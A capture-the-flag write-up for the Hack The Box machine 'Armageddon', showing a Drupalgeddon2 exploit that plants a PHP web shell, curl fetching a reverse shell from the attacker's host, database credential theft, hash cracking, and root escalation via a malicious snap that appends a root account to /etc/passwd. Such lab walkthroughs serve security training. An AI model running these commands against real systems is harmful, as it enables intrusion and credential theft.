HTB: Armageddon
Recon
First I started this machine with an nmap scan
$cat nmap-scan
# Nmap 7.91 scan initiated Thu Apr 29 15:37:49 2021 as: nmap -A -oN nmap-scan -v 10.10.10.233
Nmap scan report for 10.10.10.233
Host is up (0.020s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 29 15:38:00 2021 -- 1 IP address (1 host up) scanned in 10.70 seconds
Shell as Apache
I saw from the nmap scan that it was running Drupal 7 so I used this tool drupalgeddon2 to test for any well known vulnerabilities related to Drupal https://github.com/dreadlocked/Drupalgeddon2 and ran it and it was vulnerable to remote code execution on the machine
$ruby drupalgeddon2.rb http://10.10.10.233
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found : http://10.10.10.233/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo HMZIJPZB
[+] Result : HMZIJPZB
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://10.10.10.233/shell.php)
[!] Response: HTTP 200 // Size: 6. ***Something could already be there?***
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> whoami
apache
armageddon.htb>> id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
armageddon.htb>>
Next I used curl on the machine (as wget wasn’t on the machine) to download a php reverse shell and put it in the web directory. Although you don’t actually need to do this.
I used the php reverse shell found in the directory /usr/share/webshells/php/php-reverse-shell.php and made sure to change the ip address and the port number to that of my local machine
First I used python’s simple http server to host the php reverse shell using the command
$sudo python -m SimpleHTTPServer 80
armageddon.htb>> curl http://10.10.16.91/php-reverse-shell.php -o php-reverse-shell.php
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5493 100 5493 0 0 42169 0 --:--:-- --:--:-- --:--:-- 42253
armageddon.htb>>
Apache => brucetherealadmin:
Next I first enumerated the drupal configuration’s file located in /var/www/html/sites/default/settings.php and managed to find mysql login credentials
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
]
From here I was a little stuck trying to get a pty reverse shell so that I could access the mysql database and start enumeration of that. However I didn’t find anyway for me to do that so instead I executed commands in mysql using the “-e” arument which worked a charm and I was able to get the password hash of brucetherealadmin
armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "use drupal;select * from users;"
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1619728537 1619728537 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
armageddon.htb>>
Next I copied the password hash and cracked it using hashcat and the rockyou wordlist. But first I used hashid to identify the hash and it was a drupal 7 hash
$hashid hash.txt
--File 'hash.txt'--
Analyzing '$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt'
[+] Drupal > v7.x
--End of file 'hash.txt'--┌─[purplerabbit@kali]─[~/Documents/htb/armageddon]
└──╼ $
Looking on the hashcat website of example hashes the mode I would need to use was 7900 for a drupal 7 hash https://hashcat.net/wiki/doku.php?id=example_hashes
Next I used hashcat to crack the password which gave me the password of booboo
$hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz, 3300/3364 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
INFO: All hashes found in potfile! Use --show to display them.
Started: Fri Apr 30 08:44:46 2021
Stopped: Fri Apr 30 08:44:47 2021
┌─[purplerabbit@kali]─[~/Documents/htb/armageddon]
└──╼ $hashcat -m 7900 hash.txt /usr/share/wordlists/rockyou.txt --show
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
WIth this password I used ssh to access the machine as brucetherealadmin user
Brucetherealadmin => root
The first thing I did was use sudo -l to see if I could run any commands as the root user and I could run snap with sudo
$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
Looking at gtfobins website for how to exploit this I could install fpm on the local machine and use that to generate a malicious package on the remote machine. https://gtfobins.github.io/gtfobins/snap/#sudo
To install I followed the instructions on the website https://fpm.readthedocs.io/en/latest/installing.html Using the commands on my local Kali machine
sudo apt-get install ruby ruby-dev rubygems build-essential
and
gem install --no-document fpm
Next for the command variable I had it echo in a new root user which I knew the password for. So used
$COMMAND="echo root2:wPOZpnYePkDww:0:0:root:/root:/bin/bash >> /etc/passwd"
┌─[purplerabbit@kali]─[~/Documents/htb/armageddon]
└──╼ $cd $(mktemp -d)
┌─[purplerabbit@kali]─[/tmp/tmp.T3ug2flct2]
└──╼ $mkdir -p meta/hooks
┌─[purplerabbit@kali]─[/tmp/tmp.T3ug2flct2]
└──╼ $printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
┌─[purplerabbit@kali]─[/tmp/tmp.T3ug2flct2]
└──╼ $chmod +x meta/hooks/install
┌─[purplerabbit@kali]─[/tmp/tmp.T3ug2flct2]
└──╼ $fpm -n xxxx -s dir -t snap -a all meta
Created package {:path=>"xxxx_1.0_all.snap"}
┌─[purplerabbit@kali]─[/tmp/tmp.T3ug2flct2]
└──╼ $sudo python -m SimpleHTTPServer 80
[sudo] password for purplerabbit:
Serving HTTP on 0.0.0.0 port 80 ...
With the package generated I transferred it over to the machine using curl and python’s simplehttpserver and then ran it
$ curl http://10.10.16.91/xxxx_1.0_all.snap -o xxxx_1.0_all.snap
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4096 100 4096 0 0 99k 0 --:--:-- --:--:-- --:--:-- 105k
[brucetherealadmin@armageddon ~]$ ls
user.txt xxxx_1.0_all.snap
[brucetherealadmin@armageddon ~]$ sudo snap install xxxx_1.0_all.snap --dangerous --devmode
error: cannot perform the following tasks:
- Run install hook of "xxxx" snap if present (run hook "install": exit status 1)
[brucetherealadmin@armageddon ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
brucetherealadmin:x:1000:1000::/home/brucetherealadmin:/bin/bash
root2:wPOZpnYePkDww:0:0:root:/root:/bin/bash
[brucetherealadmin@armageddon ~]$ su - root2
Password:
Last login: Thu Apr 29 17:18:50 BST 2021 on pts/1
[root@armageddon ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@armageddon ~]#
With that I got root on the machine!